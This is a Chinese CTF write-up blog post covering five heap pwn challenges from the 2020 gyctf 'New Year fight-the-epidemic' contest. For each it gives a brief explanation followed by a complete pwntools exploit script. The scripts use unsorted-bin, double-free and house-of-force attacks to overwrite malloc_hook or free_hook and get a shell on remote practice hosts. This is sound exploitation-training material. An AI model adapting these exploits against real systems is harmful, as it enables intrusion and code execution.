美文网首页
新春战疫公益赛复盘(一)

新春战疫公益赛复盘(一)

作者: cnitlrt | 来源:发表于2020-03-19 21:28 被阅读0次

gyctf_2020_document

堆上有指针,通过劫持堆上的指针控制free_hook或者malloc_hook从而getshell

exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'gyctf_2020_document'
elf = ELF('gyctf_2020_document')
libc = elf.libc
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
else:
  host = ""
  port =  0
  p = remote(host,port)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def add(name,sex,payload):
    sla("Give me your choice : \n","1")
    sa("name\n",name)
    sa("sex\n",sex)
    sa("information\n",payload)
def show(idx):
    sla('Give me your choice : \n',"2")
    sla('Give me your index : \n',str(idx))
def free(idx):
    sla('Give me your choice : \n',"4")
    sla('Give me your index : \n',str(idx))
def edit(idx,payload):
    sla('Give me your choice : \n',"3")
    sla("Give me your index : \n",str(idx))
    sla('Are you sure change sex?\n',"Y")
    sa('Now change information\n',payload)
add("aaaaaaaa","bbbbbbbb","c"*112)
add("aaaaaaaa","bbbbbbbb","c"*112)
free(0)
show(0)
libc_base = l64()-0x3c4b78
lg("libc_base",libc_base)
free_hook = libc_base+0x3c67a8
lg('free_hook',free_hook)
sys_addr =0x45390+libc_base
add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
free(1)
add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
edit(0,p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8)
edit(3,p64(sys_addr)+p64(0)*13)
free(1)
p.interactive()

gyctf_2020_signin

申请堆块的大小固定,由于是ubuntu18因此存在着tcache机制,我们申请8个堆块,然后释放,有一个堆块进入unsorted,接着用unsortedbinattrack来填写ptr处的值使其不为0调用后门函数
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'gyctf_2020_signin'
elf = ELF('gyctf_2020_signin')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node3.buuoj.cn"
  port =  27747
  p = remote(host,port)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def add(idx):
    sla("your choice?","1")
    sla("idx?\n",str(idx))
def free(idx):
    sla("your choice?","3")
    sla("idx?\n",str(idx))
def edit(idx,payload):
    sla("your choice?","2")
    sla("idx?\n",str(idx))
    se(payload)
def backdoor():
    sla("your choice?","6")
for i in range(8):
    add(i)
for i in range(8):
    free(i)
edit(7,p64(0x4040C0-0x10))  #unsorted bin attrack
add(8)
backdoor()
p.interactive()

interesting

使用格式化字符串泄露地址,存在UAF漏洞,直接构造doublefree链劫持malloc_hook
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'interesting'
elf = ELF('interesting')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node3.buuoj.cn"
  port =  25188
  p = remote(host,port)
def debug(cmd):
  raw_input("debug:")
  gdb.attach(p,cmd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
sla("please:","OreOOrereOOreO%17$p")
sla(" to do :","0")
ru("OreOOrereOOreO")
ru("0x")
libc_base = int(p.recv(12),16)-0x20830
lg("libc_base",libc_base)
malloc_hook = libc_base+0x3c4b10
lg("malloc_hook",malloc_hook)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
one = o_g[3]+libc_base 
lg("one",one)
def add(size,O,length,RE):
    sla("to do :","1")
    sla("length :",str(size))
    sa("O : ",O)
    sla("length :",str(length))
    sa("RE : ",RE)
def edit(idx,payload1,payload2):
    sla("to do :","2")
    sla("> Oreo ID : ",str(idx))
    sa("> O : ",payload1)
    sa("> RE : ",payload2)
def free(idx):
    sla("to do :","3")
    sla("> Oreo ID : ",str(idx))
def puts(idx):
    sla("to do :","4")
    sla("> Oreo ID : ",str(idx))
add(0x60,"aaaa",0x70,"bbbb")
add(0x60,"cccc",0x70,"dddd")
free(1)
free(2)
free(1)
add(0x60,p64(malloc_hook-0x23),0x70,"aaaa")
add(0x60,p64(malloc_hook-0x23),0x70,"bbbb")
add(0x60,p64(malloc_hook-0x23),0x60,"a"*0x13+p64(one))
#gdb.attach(p)
sla("to do :","1")
sla("length :",str(0x20))
p.interactive()

gyctf_2020_force

house of force劫持malloc_hook因为one_gadget全部失效因此需要和realloc_hook配合使用
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

binary = 'gyctf_2020_force'
elf = ELF('gyctf_2020_force')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node3.buuoj.cn"
  port =  25028
  p = remote(host,port)
def debug(cmd):
  raw_input("debug:")
  gdb.attach(p,cmd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
def add(size,payload):
    sla("puts\n","1")
    sla("size\n",str(size))
    p.recvuntil("0x")
    addr = int(p.recv(12),16)
    sa("content\n",payload)
    return addr
def puts():
    sla("puts\n","2")
addr = add(0x200000,"aaaaaa")
lg("addr",addr)
libc_base = addr + 0x200ff0
lg("libc_base",libc_base)
malloc_hook = libc_base+0x3c4b10
lg("malloc_hook",malloc_hook)
top = add(0x18,"a"*0x10+p64(0)+p64(0xffffffffffffffff))+0x10
lg("top",top)
realloc = libc_base+libc.sym["__libc_realloc"]
lg("realloc",realloc)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
one = o_g[1]+libc_base 
offset = malloc_hook-top
lg("offset",offset)
add((offset-0x33),"aaaa")
add(0x10,"a"*0x8+p64(one)+p64(realloc+16))
#gdb.attach(p)
sla("puts\n","1")
sla("size\n",str(0x20))
p.interactive()

exceting

程序首先讲flag文件读进了程序中,并且在0x6020a0处还存在着一个0x60的size,因此我们把堆块劫持到0x6020a0的位置,便可以直接show处flag
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

binary = 'exceting'
elf = ELF('exceting')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node3.buuoj.cn"
  port =  26040
  p = remote(host,port)
def debug(cmd):
  raw_input("debug:")
  gdb.attach(p,cmd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
def add(length,ba,size,na):
    sla("do :","1")
    sla("length :",str(length))
    sla("ba :",ba)
    sla("length :",str(size))
    sla("na :",na)
def free(idx):
    sla("do :","3")
    sla("ID :",str(idx))
def show(idx):
    sla("do :","4")
    sla("ID :",str(idx))
add(0x50,"aaaa",0x50,"aaaa")
add(0x50,"bbbb",0x50,"bbbb")
free(0)
free(1)
free(0)
add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
add(0x50,"",0x30,"")
show(2)
#gdb.attach(p)
p.interactive()

相关文章

网友评论

      本文标题:新春战疫公益赛复盘(一)

      本文链接:https://www.haomeiwen.com/subject/fspcyhtx.html